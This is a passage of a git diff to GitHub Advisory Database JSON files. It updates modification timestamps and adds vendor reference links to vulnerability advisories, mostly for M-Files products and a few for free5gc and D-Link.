"https://nvd.nist.gov/vuln/detail/CVE-2024-0563" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-0563" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-0563" diff --git a/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json b/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json index a5024b1a4e8f8..b25891bc29ca3 100644 --- a/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json +++ b/advisories/unreviewed/2024/04/GHSA-5943-48f3-6wx5/GHSA-5943-48f3-6wx5.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-5943-48f3-6wx5", - "modified": "2024-08-27T12:30:44Z", + "modified": "2026-02-23T12:31:28Z", "published": "2024-04-26T06:30:35Z", "aliases": [ "CVE-2024-4056" ], - "details": "\nDenial of service condition in M-Files Server in versions before 24.4.13592.4 and after 23.11 (excluding 24.2 LTS) allows unauthenticated user to consume computing resources.\n\n", + "details": "Denial of service condition in M-Files Server in versions before 24.4.13592.4 and after 23.11 (excluding 24.2 LTS) allows unauthenticated user to consume computing resources.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4056" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-4056" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-4056" diff --git a/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json b/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json index ddab857bc5718..ade0b013597d1 100644 --- a/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json +++ b/advisories/unreviewed/2024/07/GHSA-88qp-7q8w-jhw6/GHSA-88qp-7q8w-jhw6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-88qp-7q8w-jhw6", - "modified": "2024-08-27T12:30:44Z", + "modified": "2026-02-23T12:31:28Z", "published": "2024-07-29T15:30:36Z", "aliases": [ "CVE-2024-6881" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6881" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-6881" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-6881" diff --git a/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json b/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json index d4b6fb379b218..2ff8e0a7f889a 100644 --- a/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json +++ b/advisories/unreviewed/2024/07/GHSA-vf38-34c2-p6j8/GHSA-vf38-34c2-p6j8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vf38-34c2-p6j8", - "modified": "2024-08-27T12:30:44Z", + "modified": "2026-02-23T12:31:28Z", "published": "2024-07-29T15:30:35Z", "aliases": [ "CVE-2024-6124" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6124" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-6124" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-6124" diff --git a/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json b/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json index ae703934c4fdc..d7b305ac4b873 100644 --- a/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json +++ b/advisories/unreviewed/2024/08/GHSA-28pw-27gw-65v8/GHSA-28pw-27gw-65v8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-28pw-27gw-65v8", - "modified": "2024-09-07T00:31:28Z", + "modified": "2026-02-23T12:31:28Z", "published": "2024-08-27T12:30:44Z", "aliases": [ "CVE-2024-6789" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6789" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-6789" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-6789" diff --git a/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json b/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json index 6e5df44a4ab1c..a51b40deb71f1 100644 --- a/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json +++ b/advisories/unreviewed/2024/10/GHSA-96w8-fcjx-v927/GHSA-96w8-fcjx-v927.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-96w8-fcjx-v927", - "modified": "2024-10-02T06:30:26Z", + "modified": "2026-02-23T12:31:29Z", "published": "2024-10-02T06:30:26Z", "aliases": [ "CVE-2024-9174" ], "details": "Stored HTML Injection in Social Module in M-Files Hubshare before version 5.0.8.6 allows authenticated user to spoof UI", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -19,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9174" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-9174" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-9174" diff --git a/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json b/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json index 194b0c5766cfb..5c5a2aab3a5e0 100644 --- a/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json +++ b/advisories/unreviewed/2024/10/GHSA-9hv6-whj4-wpw5/GHSA-9hv6-whj4-wpw5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9hv6-whj4-wpw5", - "modified": "2024-10-02T06:30:27Z", + "modified": "2026-02-23T12:31:29Z", "published": "2024-10-02T06:30:27Z", "aliases": [ "CVE-2024-9333" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9333" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-9333" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-9333" diff --git a/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json b/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json index c1a5eb2819ed6..099e986b06ce3 100644 --- a/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json +++ b/advisories/unreviewed/2024/11/GHSA-c3rr-7229-8p7f/GHSA-c3rr-7229-8p7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c3rr-7229-8p7f", - "modified": "2025-10-29T15:31:50Z", + "modified": "2026-02-23T12:31:29Z", "published": "2024-11-20T09:32:54Z", "aliases": [ "CVE-2024-10127" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10127" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-10127" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/CVE-2024-10127" diff --git a/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json b/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json index 70b18fa5964be..5d5af848e525c 100644 --- a/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json +++ b/advisories/unreviewed/2024/11/GHSA-f74h-hvpw-9xwm/GHSA-f74h-hvpw-9xwm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f74h-hvpw-9xwm", - "modified": "2025-11-20T18:30:59Z", + "modified": "2026-02-23T12:31:29Z", "published": "2024-11-20T09:32:54Z", "aliases": [ "CVE-2024-10126" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10126" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-10126" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/CVE-2024-10126" diff --git a/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json b/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json index 91e9f3fbe46db..3ff372b66a22f 100644 --- a/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json +++ b/advisories/unreviewed/2024/11/GHSA-fwqv-682v-f9jf/GHSA-fwqv-682v-f9jf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fwqv-682v-f9jf", - "modified": "2024-11-20T09:32:55Z", + "modified": "2026-02-23T12:31:29Z", "published": "2024-11-20T09:32:55Z", "aliases": [ "CVE-2024-11176" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11176" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2024-11176" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/CVE-2024-11176" diff --git a/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json b/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json index dc40b9edee152..8a04b1762fa23 100644 --- a/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json +++ b/advisories/unreviewed/2025/01/GHSA-3gmg-r977-hqcc/GHSA-3gmg-r977-hqcc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3gmg-r977-hqcc", - "modified": "2025-10-03T15:31:14Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-01-23T12:32:36Z", "aliases": [ "CVE-2025-0648" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0648" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-0648" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-0648" diff --git a/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json b/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json index 475041f1a2759..543d14dcccf0f 100644 --- a/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json +++ b/advisories/unreviewed/2025/01/GHSA-74h7-xgm8-8m8h/GHSA-74h7-xgm8-8m8h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-74h7-xgm8-8m8h", - "modified": "2025-10-03T00:31:00Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-01-23T12:32:36Z", "aliases": [ "CVE-2025-0635" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0635" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-0635" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-0635" diff --git a/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json b/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json index 84f19249ae9f7..f39e8dd98fccb 100644 --- a/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json +++ b/advisories/unreviewed/2025/01/GHSA-hqvw-49x7-pm7w/GHSA-hqvw-49x7-pm7w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hqvw-49x7-pm7w", - "modified": "2025-10-03T00:31:00Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-01-23T12:32:35Z", "aliases": [ "CVE-2025-0619" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0619" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-0619" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-0619" diff --git a/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json b/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json index 6d82b23f5dc1f..6f09145190554 100644 --- a/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json +++ b/advisories/unreviewed/2025/04/GHSA-hj5f-q3p2-c2h3/GHSA-hj5f-q3p2-c2h3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hj5f-q3p2-c2h3", - "modified": "2025-10-01T00:30:17Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-04-04T09:30:32Z", "aliases": [ "CVE-2025-3086" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3086" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-3086" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-3086" diff --git a/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json b/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json index afc9271c081f6..d04dfa96752d3 100644 --- a/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json +++ b/advisories/unreviewed/2025/04/GHSA-hjj2-4jq5-9f5q/GHSA-hjj2-4jq5-9f5q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hjj2-4jq5-9f5q", - "modified": "2025-11-19T21:31:14Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-04-04T09:30:33Z", "aliases": [ "CVE-2025-3087" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3087" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-3087" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-3087" diff --git a/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json b/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json index 32835497784c8..bcb3bfc371024 100644 --- a/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json +++ b/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pc6c-whfr-9343", - "modified": "2025-04-04T06:34:24Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-04-04T06:34:24Z", "aliases": [ "CVE-2025-2159" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2159" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-2159" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-2159" diff --git a/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json b/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json index 9b11c76c7461d..f03f9d64ace88 100644 --- a/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json +++ b/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3r4h-xx4c-77cj", - "modified": "2025-10-09T18:30:25Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-06-15T21:30:30Z", "aliases": [ "CVE-2025-5964" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5964" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-5964" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-5964" diff --git a/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json b/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json index 85ac90cce45d5..355bfe6f53e7a 100644 --- a/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json +++ b/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-525r-jw95-mh3f", - "modified": "2025-10-29T21:30:32Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-06-16T09:30:38Z", "aliases": [ "CVE-2025-2091" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2091" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-2091" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-2091" diff --git a/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json b/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json index e24eaffeeae06..733e4367f4231 100644 --- a/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json +++ b/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x6wm-h4q7-p8hv", - "modified": "2025-10-14T21:30:26Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-09-15T12:31:25Z", "aliases": [ "CVE-2025-9826" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9826" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-9826" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2024-9826" diff --git a/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json b/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json index 3e18c6e0f7ce6..c0f6c2108a637 100644 --- a/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json +++ b/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-29mq-c452-8pvf", - "modified": "2025-11-20T21:30:31Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-11-17T12:30:14Z", "aliases": [ "CVE-2025-11681" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11681" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-11681" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-11681" diff --git a/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json b/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json index d8dfe288bb6c0..b8f3357f4026d 100644 --- a/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json +++ b/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-829c-jpvx-vfrv", - "modified": "2025-12-19T09:30:27Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-12-19T09:30:27Z", "aliases": [ "CVE-2025-13008" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13008" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-13008" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-13008" diff --git a/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json b/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json index 9f921bba0e96f..7566460559012 100644 --- a/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json +++ b/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h8c5-64wc-h8mf", - "modified": "2026-01-06T21:30:28Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-12-18T09:30:24Z", "aliases": [ "CVE-2025-14318" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14318" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-14318" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-14318" diff --git a/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json b/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json index 3442aeb84836c..e036631ce0fc6 100644 --- a/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json +++ b/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xcmx-jj38-v524", - "modified": "2026-01-06T18:31:24Z", + "modified": "2026-02-23T12:31:29Z", "published": "2025-12-19T09:30:27Z", "aliases": [ "CVE-2025-14267" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14267" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2025-14267" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2025-14267" diff --git a/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json b/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json index 8afecde3d4336..8c7efb33c1c1e 100644 --- a/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json +++ b/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4v8j-92c3-9f2f", - "modified": "2026-01-30T15:31:14Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-01-30T15:31:14Z", "aliases": [ "CVE-2026-1684" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/free5gc/smf/pull/188" }, + { + "type": "WEB", + "url": "https://github.com/free5gc/smf" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343477" diff --git a/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json b/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json index 3843011750e91..6a8bca5b8bd06 100644 --- a/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json +++ b/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-frg8-29h3-wvgf", - "modified": "2026-01-30T15:31:14Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-01-30T15:31:14Z", "aliases": [ "CVE-2026-1683" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/free5gc/smf/pull/188" }, + { + "type": "WEB", + "url": "https://github.com/free5gc/smf" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343476" diff --git a/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json b/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json index fc351e90cfc9a..1238be454f62f 100644 --- a/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json +++ b/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-grx8-c238-5vmr", - "modified": "2026-02-02T18:31:31Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-01-21T12:30:30Z", "aliases": [ "CVE-2026-0663" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0663" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2026-0663" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2026-0663" diff --git a/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json b/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json index e065cabb91877..56fd16af59a89 100644 --- a/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json +++ b/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hc69-r6rr-hmxf", - "modified": "2026-01-30T15:31:14Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-01-30T15:31:14Z", "aliases": [ "CVE-2026-1682" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/free5gc/smf/pull/188" }, + { + "type": "WEB", + "url": "https://github.com/free5gc/smf" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343475" diff --git a/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json b/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json index 9ddf49f0a1b87..6172acaee9978 100644 --- a/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json +++ b/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2846-35pp-gqxq", - "modified": "2026-02-09T12:30:22Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-09T12:30:22Z", "aliases": [ "CVE-2026-2227" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.753450" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753980" + }, { "type": "WEB", "url": "https://www.dlink.com" diff --git a/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json b/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json index 3053ce35ea65e..69278a35b7548 100644 --- a/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json +++ b/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json @@ -1,7 